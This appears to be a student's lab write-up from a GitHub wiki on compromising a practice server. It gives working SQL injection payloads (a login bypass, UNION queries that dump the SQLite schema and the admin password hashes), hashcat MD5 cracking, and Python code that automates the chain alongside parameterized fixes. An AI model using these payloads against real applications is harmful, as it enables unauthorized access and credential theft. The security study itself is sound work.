Exploiting Gloin - Foren-Ken/tech-journal GitHub Wiki

Details

Server Name: gloin.shire.org
Server IP Address: 10.0.5.31
Nmap Scan Results
nmap --top-ports 100 -A 10.0.5.31

| Port | State | Service | Version |
|------|-------|---------|---------|
| 22/tcp | open | ssh | OpenSSH for_Windows_7.7 (protocol 2.0) |
| 443/tcp | open | ssl/http | Apache httpd 2.4.51 ((Win64) OpenSSL/1.1.1l PHP/7.3.31) |
| 3389/tcp | open | ms-wbt-server | Microsoft Terminal Services |

I gained administrator access to this server through the following steps:

  1. The login page at https://10.0.5.31 accepted the input ' or 1=1 -- in the username field, because the form splices its input straight into the query without sanitizing or parameterizing it: the injected condition is always true and the -- comments out the rest of the statement, including the password check.

  2. From the entrance exam page at https://10.0.5.31/entrance_exam/ I ran dirb to look for other accessible directories. It found https://10.0.5.31/entrance_exam/admin, which serves the admin login page.

  3. The admin login form had the same flaw: ' or 1=1 -- in the "username" field with an arbitrary password logged me in as the admin account.

  4. The admin account manages the exam list, and the exam view takes an id parameter in the URI (page=view_exam&id=...) that is spliced directly into a query, so SQL can be injected there. To learn how many columns that query selects (the number a UNION has to match), I appended ORDER BY n to the id and raised n until the server errored: ORDER BY 7 was the highest value accepted without error, so the query returns 7 columns. The error message also identified the backend as SQLite.

  5. SQLite keeps its schema, the CREATE statement of every table and index, in the sqlite_master table (also reachable as sqlite_schema since version 3.33.0); selecting its sql column dumps the table definitions rather than the table contents. With the column count known, I crafted a UNION that puts a literal in the first column, sql in the second and null in the remaining five: https://10.0.5.31/entrance_exam/admin/?page=view_exam&id=-1%27%20union%20all%20select%20%221%22,sql,null,null,null,null,null%20from%20sqlite_master%20--

  6. The schema dump showed an admin_list table with two columns of interest, username and password. group_concat() folds every row of a column into one comma-separated string, so a single UNION row returns the whole table: https://10.0.5.31/entrance_exam/admin/?page=view_exam&id=-1%27%20union%20all%20select%20%221%22,group_concat(username),null,null,group_concat(password),group_concat(password),group_concat(password)%20from%20admin_list%20--

  7. The hashes are 32 hexadecimal characters, which matches MD5, so I cracked the first one with hashcat in MD5 mode (-m 0) using a dictionary attack (-a 0) against rockyou.txt. The first hash belongs to admin, since admin is first in the concatenated username list. The command was hashcat -m 0 -a 0 "4214db3884e9cd913b49b5b44e49ae96" rockyou.txt --show; --show only prints a result already recorded in the potfile, which was there because I had run the same crack earlier.

  8. With the cleartext password I used ssh to log in to 10.0.5.31 as Administrator, which gave me administrator access to the server.
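
The injection chain from steps 1 to 6, reproduced as an added example against a constructed in-memory SQLite database; this is example code written for this page, not the exam application's code. The admin_list table and its username and password columns are taken from the write-up; the exams table, its seven column names and every row value are assumptions, and the two stored hashes are MD5 of constructed strings. The vulnerable login and view_exam functions splice input into the SQL text the way the site evidently does, and the _safe versions show the parameterized form that defeats the same payloads:

```python
import sqlite3

# Constructed stand-in for the exam application's SQLite database. The admin_list
# table and its username/password columns come from the write-up; the exams table,
# its seven columns and all row values are assumptions made for this example.
SCHEMA = """
CREATE TABLE admin_list (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
CREATE TABLE exams (id INTEGER PRIMARY KEY, title TEXT, subject TEXT, duration INTEGER,
                    total_marks INTEGER, pass_marks INTEGER, status TEXT);
INSERT INTO admin_list (username, password) VALUES ('admin',   '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO admin_list (username, password) VALUES ('proctor', '098f6bcd4621d373cade4e832627b4f6');
INSERT INTO exams VALUES (1, 'Entrance Exam', 'General', 60, 100, 40, 'active');
"""

EXAM_COLS = "id, title, subject, duration, total_marks, pass_marks, status"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- the flaw: user input spliced into the SQL text (what steps 1, 3 and 4 exploit) ---

def login_vulnerable(conn, username, password):
    sql = (f"SELECT username FROM admin_list "
           f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def view_exam_vulnerable(conn, exam_id):
    sql = f"SELECT {EXAM_COLS} FROM exams WHERE id = '{exam_id}'"
    return conn.execute(sql).fetchall()


# --- the fix: bound parameters, so the payload is a value and never SQL syntax ---

def login_safe(conn, username, password):
    sql = "SELECT username FROM admin_list WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def view_exam_safe(conn, exam_id):
    sql = f"SELECT {EXAM_COLS} FROM exams WHERE id = ?"
    return conn.execute(sql, (exam_id,)).fetchall()


# --- the attacker-side chain from the write-up, driven through a view function ---

def count_columns(view, conn, max_cols=20):
    """Step 4: ORDER BY n succeeds while n <= column count; the first n that
    errors ('ORDER BY term out of range') gives the count as n - 1."""
    for n in range(1, max_cols + 1):
        try:
            view(conn, f"1' ORDER BY {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None  # never errored: the input is not reaching the SQL text


def dump_schema(view, conn, ncols):
    """Step 5: sqlite_master.sql holds the CREATE statement of every object."""
    filler = ", ".join(["null"] * (ncols - 2))
    payload = f"-1' UNION ALL SELECT '1', sql, {filler} FROM sqlite_master --"
    return [row[1] for row in view(conn, payload)]


def dump_credentials(view, conn, ncols):
    """Step 6: group_concat() folds every row into one string, so the whole
    table arrives in a single UNION row; returns {username: hash}."""
    filler = ", ".join(["null"] * (ncols - 3))
    payload = (f"-1' UNION ALL SELECT '1', group_concat(username), "
               f"group_concat(password), {filler} FROM admin_list --")
    row = view(conn, payload)[0]
    return dict(zip(row[1].split(","), row[2].split(",")))


if __name__ == "__main__":
    db = build_db()
    print(login_vulnerable(db, "' or 1=1 -- ", "x"))   # ['admin', 'proctor']
    print(login_safe(db, "' or 1=1 -- ", "x"))         # []
    n = count_columns(view_exam_vulnerable, db)         # 7
    print(n, dump_schema(view_exam_vulnerable, db, n))
    print(dump_credentials(view_exam_vulnerable, db, n))
    print(count_columns(view_exam_safe, db))            # None
```

Against the parameterized view_exam the ORDER BY probe never errors and count_columns returns None, because the whole payload is compared as a literal id value; that is the check to run when confirming a fix, since the same ' or 1=1 -- bypass and UNION payloads come back empty instead of failing loudly.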

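An added example, not the author's tooling, of what hashcat -m 0 -a 0 does in step 7: guess the digest type from its length and run a dictionary attack by hashing each candidate and comparing. The wordlist is a constructed stand-in for rockyou.txt, and the hashes cracked here are MD5 of constructed words, not the admin hash from the page. The length check is only a hint, which is the caveat worth knowing when picking a hashcat mode: NTLM (-m 1000) and MD4 (-m 900) also produce 32 hex characters, and a wrong guess simply cracks nothing.

```python
import hashlib

# Constructed stand-in for rockyou.txt; these words are not real leaked data.
WORDLIST = ["123456", "12345678", "qwerty", "letmein", "password", "dragon"]

# Digest length in hex characters -> (hashlib name, hashcat mode). Length is
# only a hint: NTLM (-m 1000) and MD4 (-m 900) are 32 hex characters as well.
HEX_LENGTH_TO_ALGO = {32: ("md5", 0), 40: ("sha1", 100), 64: ("sha256", 1400)}


def identify(hexdigest):
    """Return (hashlib name, hashcat mode) guessed from a hex digest, or None."""
    h = hexdigest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return None
    return HEX_LENGTH_TO_ALGO.get(len(h))


def crack(hexdigest, words):
    """Dictionary attack (hashcat -a 0): hash every candidate with the guessed
    algorithm and compare against the target; returns the plaintext or None."""
    info = identify(hexdigest)
    if info is None:
        return None
    algo, _mode = info
    target = hexdigest.strip().lower()
    for word in words:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    demo = hashlib.md5(b"password").hexdigest()
    print(identify(demo), crack(demo, WORDLIST))   # ('md5', 0) password
```
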
Difficulties

The main issue I encountered when initially accessing the target was not knowing the basic ' or 1=1-- trick. This caused me to go on long research sessions to discover obscure vulnerabilities. Once I had discovered it was that simple, the next issue I faced was with utilizing the cracked password. Unlike any machine before, the account was not the name of the machine or "admin". This made me doubt that the password was correct, and I went back to looking for another way. In class, I was told that the account is named "Administrator", which was just silly since I had spent so much time looking for such a simple solution.